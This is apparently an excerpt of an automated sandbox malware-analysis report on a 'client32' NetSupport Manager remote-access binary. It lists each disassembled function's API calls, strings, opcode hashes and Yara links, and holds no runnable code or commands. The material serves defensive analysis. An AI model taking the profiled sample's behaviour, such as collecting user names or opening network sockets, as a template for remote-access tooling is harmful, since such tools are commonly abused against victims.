                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Parent$Child__wcstoi64
                                                                                                                                        • String ID: FixEHParent$_debug
                                                                                                                                        • API String ID: 320216221-498807111
                                                                                                                                        • Opcode ID: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
                                                                                                                                        • Instruction ID: 19ed4bc464ac013ef3aede55ea0528bdf8a938b54301afc5030378f5434f72ea
                                                                                                                                        • Opcode Fuzzy Hash: 4bddab196cb6adcd855e2140b2b419c3c761946d297c8f23d9730be6298a245d
                                                                                                                                        • Instruction Fuzzy Hash: 33F09636E01925679F01A6AD4C84DAFFADE9DC555830140E7FE25EB100ED609E01C7A1
                                                                                                                                        Function 688F5600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F2A90: GetModuleFileNameA.KERNEL32(00000000,?,00000100), ref: 688F2ACB
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2ADA
                                                                                                                                          • Part of subcall function 688F2A90: _strrchr.LIBCMT ref: 688F2AEA
                                                                                                                                          • Part of subcall function 688F2A90: wsprintfA.USER32 ref: 688F2B05
                                                                                                                                        • _memset.LIBCMT ref: 688F561A
                                                                                                                                        • WSAStartup.WSOCK32(00000101,6893B91A), ref: 688F5635
                                                                                                                                          • Part of subcall function 688F5290: CloseHandle.KERNEL32(00000000,688F5678), ref: 688F529A
                                                                                                                                        • WSACleanup.WSOCK32 ref: 688F566E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _strrchr$CleanupCloseFileHandleModuleNameStartup_memsetwsprintf
                                                                                                                                        • String ID: HTCTL32$WinSock 2.0
                                                                                                                                        • API String ID: 884463532-3006831568
                                                                                                                                        • Opcode ID: 4f831363d40170da119e5e86728687f07588fb9b5a4cc9c161b12bfa6fcb1696
                                                                                                                                        • Instruction ID: 9a9540353e28330c4ced6ca7c6f1b3e118bebaf416191a52de5a0686ed67b046
                                                                                                                                        • Opcode Fuzzy Hash: 4f831363d40170da119e5e86728687f07588fb9b5a4cc9c161b12bfa6fcb1696
                                                                                                                                        • Instruction Fuzzy Hash: 19F02B2A7882287BE73026ED5C01F7E37589B92BFCFC04832F514951408B64D54251F6
                                                                                                                                        Function 6890DBD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • wsprintfA.USER32 ref: 6890DC04
                                                                                                                                        • _memset.LIBCMT ref: 6890DC27
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc_memsetwsprintf
                                                                                                                                        • String ID: Can't alloc %u bytes$Refcount.cpp
                                                                                                                                        • API String ID: 2405090531-3988092936
                                                                                                                                        • Opcode ID: 2fb5f6caec85972761cc595f7b1a8d2fdf9455e3e4abfa5b2bec448b87848929
                                                                                                                                        • Instruction ID: 3af325ede819fce6a43e1694280fbbf0431b0ad940a04e7baaa2b8003fe157e3
                                                                                                                                        • Opcode Fuzzy Hash: 2fb5f6caec85972761cc595f7b1a8d2fdf9455e3e4abfa5b2bec448b87848929
                                                                                                                                        • Instruction Fuzzy Hash: 95F0FCB5A4412877C720EAA8AD01EAF777CDF96604F800159EF04A7141D634EA01C6D5
                                                                                                                                        Function 688F5420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$CopyFile
                                                                                                                                        • String ID: %spacket%03d.trc$%spacket%03d.trc.cap
                                                                                                                                        • API String ID: 1539649580-879557987
                                                                                                                                        • Opcode ID: 59694509f7abe2ee3abf51a93c4f553451400fdb6ac9a6430d9c1ab1deb82106
                                                                                                                                        • Instruction ID: 90d3fe2b394738bec671a89fafae56dfed799876337998355caa2c5715682c90
                                                                                                                                        • Opcode Fuzzy Hash: 59694509f7abe2ee3abf51a93c4f553451400fdb6ac9a6430d9c1ab1deb82106
                                                                                                                                        • Instruction Fuzzy Hash: A0F0687694021CBBCB20EB95DD44DDE73BCEB9E310F404195F909A7140D630AA44CBB0
                                                                                                                                        Function 688F9160 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetVersionExA.KERNEL32(?,?), ref: 688F9188
                                                                                                                                        • GetUserNameA.ADVAPI32(68906AD7,?), ref: 688F91CD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: NameUserVersion
                                                                                                                                        • String ID: *CurrentUserName$@$client
                                                                                                                                        • API String ID: 427591506-3887416126
                                                                                                                                        • Opcode ID: 78bbbe95506ac2aef2b781a988a61922882aac5d44d2d10c66f236f08c3bee8f
                                                                                                                                        • Instruction ID: c32ed21bb1de237a47f89ce9432346ee2a00d34cb241a18aa877b14528e95ca4
                                                                                                                                        • Opcode Fuzzy Hash: 78bbbe95506ac2aef2b781a988a61922882aac5d44d2d10c66f236f08c3bee8f
                                                                                                                                        • Instruction Fuzzy Hash: 42018671D1412CEBDB20EF68DC05FED77B8EB0A304F8040D9E90E66241DA745E45CB95
                                                                                                                                        Function 6890ABC0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 6890ABDA
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_malloc
                                                                                                                                        • String ID: IsA()$IsEmpty()$NSMString.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                        • API String ID: 501242067-2615622132
                                                                                                                                        • Opcode ID: b6a5f613d40ea28980dac2aa36d2e7d1d119a244ad12ffb2dcb90b6a1e2785da
                                                                                                                                        • Instruction ID: 8c80f60e9aaa065f14d06850fb5d1f9a0e273378ae7b865c4ca08db332314ba6
                                                                                                                                        • Opcode Fuzzy Hash: b6a5f613d40ea28980dac2aa36d2e7d1d119a244ad12ffb2dcb90b6a1e2785da
                                                                                                                                        • Instruction Fuzzy Hash: 20F090B16403309FD320DB8CEC02B5A77D89F99605F818829E55DA7241D371EC5087D6
                                                                                                                                        Function 68914F31 Relevance: 7.7, APIs: 5, Instructions: 160COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4048096073-0
                                                                                                                                        • Opcode ID: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
                                                                                                                                        • Instruction ID: 5386d87509ba1acbea37160695bc985833f9776d857000671be4524e1cce19e7
                                                                                                                                        • Opcode Fuzzy Hash: baa3d1309f35f1cf240b172b7daea1819837b361dbb2c345d08023d0c973fbbc
                                                                                                                                        • Instruction Fuzzy Hash: CD510A30A0C30CDFDB108FA9884469EB7B5AF55728F918229E8BA963D0D731DA51CF80
                                                                                                                                        Function 6890AC30 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __strdup.LIBCMT ref: 6890AC64
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?), ref: 6890ACA1
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?), ref: 6890ACB7
                                                                                                                                        • _malloc.LIBCMT ref: 6890ACC6
                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 6890ACE0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$__strdup_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2291067320-0
                                                                                                                                        • Opcode ID: 63146bf3f353a52c196d3a57fbfdfe7d2a8fed3672d2fe41dea0e589b9885fd7
                                                                                                                                        • Instruction ID: dcd5704c51745a70d07f1971ff3f86707ec609cebf213c9e4bf1eef8770bb479
                                                                                                                                        • Opcode Fuzzy Hash: 63146bf3f353a52c196d3a57fbfdfe7d2a8fed3672d2fe41dea0e589b9885fd7
                                                                                                                                        • Instruction Fuzzy Hash: 3A31B171A08219FFD720CF698C49FAABBB8EF46714F148159E955AB280D670E904CB90
                                                                                                                                        Function 68925283 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetFileType.KERNEL32(?,?,?,68937820,0000000C), ref: 689252B7
                                                                                                                                        • GetLastError.KERNEL32(?,?,68937820,0000000C), ref: 689252C1
                                                                                                                                        • __dosmaperr.LIBCMT ref: 689252C8
                                                                                                                                        • __alloc_osfhnd.LIBCMT ref: 689252E9
                                                                                                                                        • __set_osfhnd.LIBCMT ref: 68925313
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 43408053-0
                                                                                                                                        • Opcode ID: c805d78db43f39469ab64ad70c1062eba7f563f9d6365ecb72f313bd3d7543d0
                                                                                                                                        • Instruction ID: 200ccd1d7a6768073509baef6fa981b21d937493b1a864df5bc68f5264a07454
                                                                                                                                        • Opcode Fuzzy Hash: c805d78db43f39469ab64ad70c1062eba7f563f9d6365ecb72f313bd3d7543d0
                                                                                                                                        • Instruction Fuzzy Hash: D3212F31969208DFDB928FA8C82039C7B60AF42328FA88645D9B48F1DEC779C541CF80
                                                                                                                                        Function 689149F7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _malloc.LIBCMT ref: 68914A05
                                                                                                                                          • Part of subcall function 68911B69: __FF_MSGBANNER.LIBCMT ref: 68911B82
                                                                                                                                          • Part of subcall function 68911B69: __NMSG_WRITE.LIBCMT ref: 68911B89
                                                                                                                                          • Part of subcall function 68911B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,6891D3C1,68916E81,00000001,68916E81,?,6891F447,00000018,68937738,0000000C,6891F4D7), ref: 68911BAE
                                                                                                                                        • _free.LIBCMT ref: 68914A18
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1020059152-0
                                                                                                                                        • Opcode ID: f7a41403bdc4d676a77f4eef7e08d72c8c72e1a21cda5cc92ce6dea6e1cd6bea
                                                                                                                                        • Instruction ID: 4ab3173270ecba298c9b131fd3d0720e110025dd4a5de742e8138656254bfbe3
                                                                                                                                        • Opcode Fuzzy Hash: f7a41403bdc4d676a77f4eef7e08d72c8c72e1a21cda5cc92ce6dea6e1cd6bea
                                                                                                                                        • Instruction Fuzzy Hash: 9B11EB3694C11DEFDB321F79A804A5D3B5EAF9936DBD24425EAD98A140EF31C440CB9C
                                                                                                                                        Function 1103F120 Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1103F000: DeleteObject.GDI32(?), ref: 1103F0EB
                                                                                                                                        • CreateRectRgnIndirect.GDI32(?), ref: 1103F168
                                                                                                                                        • CombineRgn.GDI32(?,?,00000000,00000002), ref: 1103F17C
                                                                                                                                        • DeleteObject.GDI32(00000000), ref: 1103F183
                                                                                                                                        • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1103F1A6
                                                                                                                                        • CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1103F1BD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CombineCreateDeleteObjectRect$Indirect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3044651595-0
                                                                                                                                        • Opcode ID: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                                        • Instruction ID: 27b6d86d25d7e193214482d66684a995ae6d2575b2198652133f57a3d860c4fb
                                                                                                                                        • Opcode Fuzzy Hash: 1250bfdb64eb9f94442feb870266ab3da7c928c1294f43dacfd40da9a11fa5ee
                                                                                                                                        • Instruction Fuzzy Hash: 26116031A50702AFE721CE64D888B9AF7ECFB45716F00812EE66992180C770B881CB93
                                                                                                                                        Function 68916CFE Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • __getptd.LIBCMT ref: 68916D0A
                                                                                                                                          • Part of subcall function 68916F64: __getptd_noexit.LIBCMT ref: 68916F67
                                                                                                                                          • Part of subcall function 68916F64: __amsg_exit.LIBCMT ref: 68916F74
                                                                                                                                        • __getptd.LIBCMT ref: 68916D21
                                                                                                                                        • __amsg_exit.LIBCMT ref: 68916D2F
                                                                                                                                        • __lock.LIBCMT ref: 68916D3F
                                                                                                                                        • __updatetlocinfoEx_nolock.LIBCMT ref: 68916D53
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 938513278-0
                                                                                                                                        • Opcode ID: df958cde2c27f3834a2810ab76b9c72735383c7990e017337e6dffae5b3f5785
                                                                                                                                        • Instruction ID: 02e8d66279e29362835e28de451843afc265e4de5171a3a5bba882c4b43eb130
                                                                                                                                        • Opcode Fuzzy Hash: df958cde2c27f3834a2810ab76b9c72735383c7990e017337e6dffae5b3f5785
                                                                                                                                        • Instruction Fuzzy Hash: 16F0907AE1DB2CDBDB22AFA4484576E37A06F1072CFD1810DEAE4A66C0CB64C900DA55
                                                                                                                                        Function 68906770 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F8D00: GetModuleFileNameA.KERNEL32(00000000,?,00000104,689067B5), ref: 688F8D6B
                                                                                                                                          • Part of subcall function 688F8D00: GetCurrentProcessId.KERNEL32 ref: 688F8DCB
                                                                                                                                          • Part of subcall function 688F8D00: OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 688F8DD8
                                                                                                                                        • _memset.LIBCMT ref: 689067C9
                                                                                                                                        • _strncpy.LIBCMT ref: 689067DB
                                                                                                                                          • Part of subcall function 688FD140: _memset.LIBCMT ref: 688FD1BA
